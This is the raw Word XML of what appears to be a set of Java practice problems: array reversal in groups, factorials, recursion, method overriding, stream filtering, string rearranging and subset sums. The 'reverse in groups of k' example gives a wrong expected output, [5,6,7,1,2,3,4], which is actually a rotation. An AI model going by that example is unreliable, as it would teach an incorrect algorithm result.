          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
      <w:r w:rsidR="00CE0EB2" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidR="009477BC" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Reverse</w:t>
      </w:r>
      <w:r w:rsidR="00CE0EB2" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> array in groups of a given size k</w:t>
      </w:r>
      <w:bookmarkEnd w:id="336"/>
    </w:p>
    <w:p w14:paraId="1EFA9D3B" w14:textId="77777777" w:rsidR="007D5F04" w:rsidRPr="00CE4B95" w:rsidRDefault="00365A15" w:rsidP="007D5F04">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem Definition: </w:t>
      </w:r>
      <w:r w:rsidR="007D5F04" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Write a program to perform Reverse an array in groups of given size?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6EAA2B" w14:textId="437FFDBB" w:rsidR="007D5F04" w:rsidRPr="00CE4B95" w:rsidRDefault="007D5F04" w:rsidP="007D5F04">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b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
      <w:r w:rsidR="009A6418" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>[1,2,3,4,5,6,7] where k=3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15AD5B57" w14:textId="4A6145BB" w:rsidR="00365A15" w:rsidRPr="00CE4B95" w:rsidRDefault="007D5F04" w:rsidP="007D5F04">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b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> [5,6,7,1,2,3,4]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3695E03D" w14:textId="627DB60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3D6BED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63DB8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InGrou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EA98D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A00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p>
    <w:p w14:paraId="5D083FE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208825D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13174"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rou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E7302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2F623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Divide array into groups of size k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD882B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1BAE66"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EFE6BE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F3A0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58E179E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E739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0E74B4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38CF3F"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736DD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Move the last group to the front</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B49B5A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otate right by 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CAE51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C3955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Flatten the groups into final list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11444F3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49EF3E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09ED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l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6FDB875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E3BC2B"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B693D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115361C0"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6D9BBC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E0E53" w14:textId="52B99AC1"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C0850D8" w14:textId="77777777" w:rsidR="00A21DDF" w:rsidRPr="00CE4B95" w:rsidRDefault="00A21DDF" w:rsidP="00A21DDF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34E370A8" w14:textId="43FAEA27" w:rsidR="00365A15" w:rsidRPr="00CE4B95" w:rsidRDefault="00365A15">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="337" w:name="_Toc197867551"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
      <w:r w:rsidR="00DD5017" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="00DA1B68" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="00DD5017" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>rint factorials of natural numbers from 1 to 10</w:t>
      </w:r>
      <w:bookmarkEnd w:id="337"/>
    </w:p>
    <w:p w14:paraId="1AA73766" w14:textId="65147F1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actorial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979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1A77D"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ctorials of numbers from 1 to 10:"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57732C0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C8BD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3D90A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FE2E62E"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53D4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2C294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85EE2"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factorial</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569CF91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BC96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3A788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E42B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1C2030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B055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7B081C9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7F416" w14:textId="38E881AA"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0551C72D" w14:textId="77777777" w:rsidR="00DD5017" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD5017" w:rsidP="00DD5017">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59C7B34F" w14:textId="77777777" w:rsidR="00C414B2" w:rsidRPr="00CE4B95" w:rsidRDefault="00C414B2" w:rsidP="00DD5017">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1634C5EE" w14:textId="77777777" w:rsidR="00C414B2" w:rsidRPr="00CE4B95" w:rsidRDefault="00C414B2" w:rsidP="00DD5017">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29053898" w14:textId="77777777" w:rsidR="00C414B2" w:rsidRPr="00CE4B95" w:rsidRDefault="00C414B2" w:rsidP="00DD5017">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20F2AFAA" w14:textId="3F524403" w:rsidR="00365A15" w:rsidRPr="00CE4B95" w:rsidRDefault="00365A15">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="338" w:name="_Toc197867552"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Program</w:t>
      </w:r>
      <w:r w:rsidR="007B542B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="0038744E" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidR="007B542B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>everse the integer array without using loops? Using recursion?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="338"/>
    </w:p>
    <w:p w14:paraId="414322B9" w14:textId="59FB5B00"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ArrayRecurs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4CCC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12D2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array using recursion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7D63B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665E2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ase: If start index is greater than or equal to end, return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263805AC"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ar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E4DBB"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4738EC4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CC53F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BE79E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the elements at start and end</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70579C4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6C128E27"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EE469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BBE8C0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E66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cursively call the method with updated indices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8E392D"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A34795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1F0FE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B3392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A4C4F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E25273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E9A5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4253ACE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D2E0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D7C868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1F92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F4C2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recursive method to reverse the array</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B18E34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D52C8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B4223"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Reversed Array:"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC530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F1CEE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79A7A2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D4A5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0693C6" w14:textId="3D025248"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5D35BD3" w14:textId="77777777" w:rsidR="007B542B" w:rsidRPr="00CE4B95" w:rsidRDefault="007B542B" w:rsidP="007B542B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5565018F" w14:textId="43007673" w:rsidR="00981239" w:rsidRPr="00CE4B95" w:rsidRDefault="00981239" w:rsidP="00F60265">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="339" w:name="_Toc197867553"/>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F60265" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00B85AF9" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Perform</w:t>
      </w:r>
      <w:r w:rsidR="00F60265" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Overriding methods in parent child</w:t>
      </w:r>
      <w:bookmarkEnd w:id="339"/>
    </w:p>
    <w:p w14:paraId="1EF9BC18" w14:textId="7F5DE755"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715F32B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AB84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be overridden in child class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEC756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0C2C4"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imal makes a sound"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221CA495"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E2B7A1"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77AB6A9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25DBA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Child class (inherits from Animal)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7569898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CE391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3E7200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68BF42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22F26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g barks"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B96E8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D0D04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50D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732E6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8F6E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62B4A43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470D3AA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F327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at meows"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8FE25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EBC92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919073"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5F621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thodOverriding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43162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B58B1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objects of child classes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA4EE28"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Do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p>
    <w:p w14:paraId="61514C6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C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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06EDA7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641774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the overridden methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788AD62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Dog barks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0147A3A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C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Cat meows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345E7B7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F9D198" w14:textId="2564188F"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B11452" w14:textId="77777777" w:rsidR="00F60265" w:rsidRPr="00CE4B95" w:rsidRDefault="00F60265" w:rsidP="00F60265">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="262857DE" w14:textId="3C8B105D" w:rsidR="00981239" w:rsidRPr="00CE4B95" w:rsidRDefault="00981239">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="340" w:name="_Toc197867554"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
      <w:r w:rsidR="001451D6" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="00E14F87" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Return</w:t>
      </w:r>
      <w:r w:rsidR="001451D6" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> the student object if gender is male? (filter)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="340"/>
    </w:p>
    <w:p w14:paraId="778CC0FD" w14:textId="54861CB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4C1D6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1928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EF3C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BC02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416CF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4A17416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935B6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1C953D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53139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222ED0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30EC24B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8A3D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C3685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A87CD9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6116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336CBE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391FD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6E9B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132A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0AC0FF5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10A22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2A253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1E351E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D6E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e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A4162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F341F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p>
    <w:p w14:paraId="3436927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9DFB7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terMaleStud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C486A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6DA12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39CB7C9A"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4E78055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D7111C6"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25C3C3D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23D6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682B897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B2A4DD" w14:textId="3DCD0D48"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Java 8 Stream API to filter male students</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136B8F6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069F39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ude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IgnoreCas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1BB365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he first match or an empty Optional</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3DC12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value if no match is found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7827990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7AE8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result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675EBE5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8046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male stud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leStudent</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068D3770"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4859F"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male student found."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D71EF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BF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444618" w14:textId="30ED3F33"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9EC5B90" w14:textId="77777777" w:rsidR="00242515" w:rsidRPr="00CE4B95" w:rsidRDefault="00242515" w:rsidP="00242515">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EE744C5" w14:textId="204FEDC9" w:rsidR="00981239" w:rsidRPr="00CE4B95" w:rsidRDefault="00981239">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="341" w:name="_Toc197867555"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
      <w:r w:rsidR="009322AB" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Rearrange String</w:t>
      </w:r>
      <w:bookmarkEnd w:id="341"/>
    </w:p>
    <w:p w14:paraId="5DDD35FE" w14:textId="77777777" w:rsidR="00F10783" w:rsidRPr="00CE4B95" w:rsidRDefault="00981239" w:rsidP="00F10783">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem Definition: </w:t>
      </w:r>
      <w:r w:rsidR="00F10783" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Write a program using string, use only single for loop?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6D3575" w14:textId="77777777" w:rsidR="00F10783" w:rsidRPr="00CE4B95" w:rsidRDefault="00F10783" w:rsidP="007B7648">
      <w:pPr>
        <w:ind w:left="360" w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Input - String str = "Siddhant Patni";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19461535" w14:textId="1AA8775D" w:rsidR="00981239" w:rsidRPr="00CE4B95" w:rsidRDefault="00F10783" w:rsidP="007B7648">
      <w:pPr>
        <w:ind w:left="360" w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Output - SiindtdahPata</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A84B5A" w14:textId="682224C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arrang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DE0DFC"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B55A3"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68A126EE"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5F54B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whitespaces from the string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2941218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2AF40D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57059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1D7E665F"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52A0F4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999A6B6"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9D4E4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 for loop to alternate characters from start and end</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD0386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0FCB7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E439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start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B74C9A1"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81F6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end</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178953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4F2E8"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758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AF06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0FD5B91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152ABC7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516A5" w14:textId="17F73044"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03BC902" w14:textId="2007B876" w:rsidR="00981239" w:rsidRPr="00CE4B95" w:rsidRDefault="00981239" w:rsidP="002F0801">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="342" w:name="_Toc197867556"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
      <w:r w:rsidR="00CB0F2F" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Given a set of numbers {3, 35, 56, 2, 95, 10, 65, 150, 165, 23, 65, 18, 57}, find all subsets whose sum equals 28.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="342"/>
    </w:p>
    <w:p w14:paraId="10A8D463" w14:textId="78C56A1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E958D8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63EAB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ubsetsWithGiven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2FFA1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9A4A7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per method to find subsets with a given sum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F28096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FDA18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array</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462A0A6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DE469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um of the current subset equals the target sum, print the subset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B47170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4A366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p>
    <w:p w14:paraId="17164B1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4A7463"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C5FDB8F"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6DA2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E9C2F3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 the current element in the subset and move to the next element</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CCF08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dex</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193556AC"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E4ACB3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62E8C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clude the current element from the subset and move to the next element</w:t>
      </w:r>
